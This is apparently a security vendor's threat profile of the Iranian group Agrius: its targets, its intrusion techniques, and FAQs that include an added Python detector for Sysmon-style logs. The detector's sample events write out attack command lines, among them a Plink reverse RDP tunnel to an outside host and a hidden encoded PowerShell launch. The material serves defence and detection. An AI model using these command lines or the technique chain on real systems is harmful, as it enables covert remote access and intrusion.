Agrius
Agrius is an Iranian state-linked APT group known for disruptive ransomware and wiper attacks, primarily targeting Israeli and Middle Eastern entities under various aliases including SPECTRAL KITTEN and Black Shadow.

The Origin of Agrius
Agrius is an Iranian state-sponsored Advanced Persistent Threat (APT) group active since at least 2020, closely aligned with Iran’s Ministry of Intelligence and Security (MOIS). Also tracked under aliases such as SPECTRAL KITTEN, Black Shadow, and Pink Sandstorm, Agrius is known for its hybrid use of ransomware and wiper malware in destructive operations, particularly against Israeli entities. Their campaigns often disguise politically motivated attacks as financially motivated ransomware incidents, a tactic termed “lock-and-leak” where stolen data is exfiltrated and then leaked via eCrime channels.
The group makes extensive use of custom malware, such as IPSecHelper, Apostle ransomware, and FlowTunnel proxy tools. Recent intelligence links Agrius operators to Jahat Pardaz, a suspected front company for MOIS, and highlights their capability in high-impact cyber operations.
Countries Targeted
Primary geographic targets include:
- Israel, where the majority of destructive and credential-theft operations are concentrated.
- United Arab Emirates (UAE), where Agrius has engaged in limited but notable disruptions, including targeting logistics firms.
- South Asia, where historical targeting of telecommunications infrastructure suggests some operational reach outside the Middle East.
Industries Targeted
Agrius has a broad targeting scope across both public and private sectors, notably including:
- Academic and research institutions
- Consulting and professional services
- Engineering, industrials, and logistics
- Military, maritime, and transportation
- Financial services and insurance
- Technology, media, and telecommunications
- Government agencies and social media platforms
Their ability to operate across so many verticals indicates a strategic alignment with Iranian geopolitical interests, especially in espionage and disruption.
Known Victims
Known victim profiles include:
- Israeli academic institutions, where they have conducted multi-phase operations involving credential harvesting and PII exfiltration.
- A logistics entity in the UAE, impacted through disruptive malware.
- A UK-based Iranian-opposition news outlet, targeted in an influence operation, demonstrating Agrius's integration of psychological operations alongside technical intrusion.
The Agrius Attack Method
- Exploits vulnerable public-facing apps, notably CVE-2018-13379 in FortiOS; uses ProtonVPN for anonymization.
- Deploys IPSecHelper malware as a service for persistence; uses PetitPotato for local privilege escalation.
- Deactivates security tools with anti-rootkit tools like GMER64.sys, modifies EDR settings, and uses masquerading techniques.
- Dumps LSASS memory and SAM files with Mimikatz; engages in SMB brute forcing and password spraying.
- Conducts host and network scanning with tools like NBTscan, SoftPerfect, and WinEggDrop.
- Uses RDP tunneling via Plink and ASPXSpy web shells; downloads payloads from public file sharing services.
- Gathers PII and SQL data using custom tools like sql.net4.exe; stages data locally in hidden directories.
- Executes scripts and binaries via Windows command shell; uses renamed system utilities for stealth.
- Archives data using 7-Zip; exfiltrates via tools like PuTTY and WinSCP through AES-encrypted HTTP channels.
- Deploys Apostle ransomware and data wipers to cause operational disruption; leaks data to the public for influence operations.
FAQs
What is Agrius’s primary motivation?
Agrius conducts espionage and disruptive operations aligned with Iranian state interests, often masked as ransomware for plausible deniability.
How does Agrius gain initial access to networks?
They primarily exploit public-facing applications, especially Fortinet’s FortiOS (CVE-2018-13379), and use VPN services like ProtonVPN to obscure their origin.
What type of malware is Agrius known for?
Agrius uses IPSecHelper, Apostle ransomware, ASPXSpy, and the FlowTunnel proxy tool among others.
They deploy malware as Windows services (e.g., IPSecHelper) and use web shells for long-term access.
What are Agrius’s data exfiltration methods?
Data is archived using 7-Zip, staged locally, and exfiltrated using PuTTY or WinSCP, often over encrypted C2 channels.
How do they evade detection?
By disabling EDR tools, masquerading binaries, and base64 encoding scripts, Agrius evades traditional defenses.
What is their preferred method of lateral movement?
They use RDP tunneling through compromised web shells and tools like Plink, as well as acquiring valid credentials.
What detection strategies are effective against Agrius?
Monitoring for abnormal RDP tunneling, use of Plink, or sudden appearance of tools like Mimikatz or IPSecHelper can be effective. Network Detection and Response (NDR) and behavioral analytics are key.
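The host-side checks this answer describes, written out as an added example. This is not Vectra AI's detection logic and not code from the original page; the event records are constructed to resemble Sysmon process-creation (Event ID 1) and Windows service-install (Event ID 7045) logs, and the file paths, service binary location and account name in them are assumptions made for illustration. The checks cover the Plink RDP tunneling, renamed binaries, base64-encoded scripts, web-shell-spawned processes and service-based persistence listed in the attack method above as well as in this answer.

```python
"""Host-side detections for several Agrius behaviours named in this profile.

Added example; not Vectra AI's detection logic. The records below are
constructed to resemble Sysmon Event ID 1 (process creation) and Windows
System Event ID 7045 (new service installed). Paths and names are assumed.
"""
import base64
import re
from dataclasses import dataclass

# Service binaries are normally installed under these roots (assumption).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
WEB_SERVER_WORKERS = {"w3wp.exe"}  # IIS worker process that hosts ASPX pages


@dataclass
class Finding:
    rule: str
    detail: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def _stem(name: str) -> str:
    """Lower-case file name without extension, so 'Cmd.Exe' and 'cmd' compare equal."""
    return name.lower().rsplit(".", 1)[0] if "." in name else name.lower()


def check_masquerade(ev):
    """Renamed binary: on-disk name disagrees with the PE version-resource name."""
    if _stem(_basename(ev["image"])) != _stem(ev["original_file_name"]):
        return Finding("masquerading", f'{ev["image"]} is really {ev["original_file_name"]}')
    return None


def check_plink_tunnel(ev):
    """Plink used for port forwarding; 3389 in the forward spec means RDP tunneling."""
    if _stem(ev["original_file_name"]) != "plink":
        return None
    m = re.search(r"\s-[RL]\s+(\S+)", ev["cmdline"])
    if not m:
        return None
    kind = "RDP tunnel" if "3389" in m.group(1) else "port forward"
    return Finding("plink_tunnel", f"{kind} via Plink: {m.group(1)}")


def check_encoded_powershell(ev):
    """PowerShell launched with -EncodedCommand (or a prefix of it); decode for the analyst."""
    if _stem(ev["original_file_name"]) != "powershell":
        return None
    m = re.search(r"(?i)\s-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", ev["cmdline"])
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        decoded = "<undecodable>"
    return Finding("encoded_powershell", f"decoded: {decoded}")


def check_webserver_child(ev):
    """Web shell indicator: the IIS worker process spawning a tool or shell."""
    parent = _basename(ev["parent"])
    if parent.lower() in WEB_SERVER_WORKERS:
        return Finding("webserver_child", f'{parent} spawned {_basename(ev["image"])}')
    return None


def check_service_install(ev):
    """New service whose binary lives outside the usual install locations."""
    if not ev["image_path"].lower().startswith(TRUSTED_PREFIXES):
        return Finding("untrusted_service", f'{ev["service_name"]} -> {ev["image_path"]}')
    return None


PROCESS_CHECKS = (check_masquerade, check_plink_tunnel, check_encoded_powershell, check_webserver_child)


def scan(events):
    """Run every applicable check over a list of event records."""
    findings = []
    for ev in events:
        if ev["id"] == 1:
            findings.extend(f for f in (check(ev) for check in PROCESS_CHECKS) if f)
        elif ev["id"] == 7045:
            f = check_service_install(ev)
            if f:
                findings.append(f)
    return findings


# Constructed sample telemetry. The encoded payload is a harmless Start-Sleep.
ENCODED = base64.b64encode("Start-Sleep 1".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Users\Public\plink.exe", "original_file_name": "Plink",
     "cmdline": "plink.exe -N -R 3389:127.0.0.1:3389 -P 443 svc@198.51.100.10",
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe"},
    {"id": 1, "image": r"C:\Users\Public\svc.exe", "original_file_name": "Cmd.Exe",
     "cmdline": "svc.exe /c whoami", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_file_name": "PowerShell.EXE",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}", "parent": r"C:\Windows\System32\cmd.exe"},
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe", "original_file_name": "NOTEPAD.EXE",
     "cmdline": "notepad.exe report.txt", "parent": r"C:\Windows\explorer.exe"},  # benign control
    {"id": 7045, "service_name": "IPSecHelper",
     "image_path": r"C:\ProgramData\IPSecHelper\IPSecHelper.exe", "start_type": "auto start"},
    {"id": 7045, "service_name": "VendorAgent",
     "image_path": r"C:\Program Files\Vendor\agent.exe", "start_type": "auto start"},  # benign control
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.rule}] {finding.detail}")
```

The masquerading check relies on Sysmon's OriginalFileName field, which some legitimately repackaged binaries also fail, so it is a triage lead rather than a standalone alert; the service-path and web-server-child checks likewise need a baseline of what normally runs in the environment before they are tuned into alerts.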
What industries are at highest risk from Agrius?
Organizations in Israel across sectors like academia, telecom, and logistics, as well as UAE-based logistics and transport firms, are primary targets.
Is Network Detection and Response (NDR) useful in defending against Agrius?
Yes. NDR is particularly valuable in detecting encrypted C2 traffic, abnormal lateral movement, and data exfiltration behavior that bypasses endpoint controls.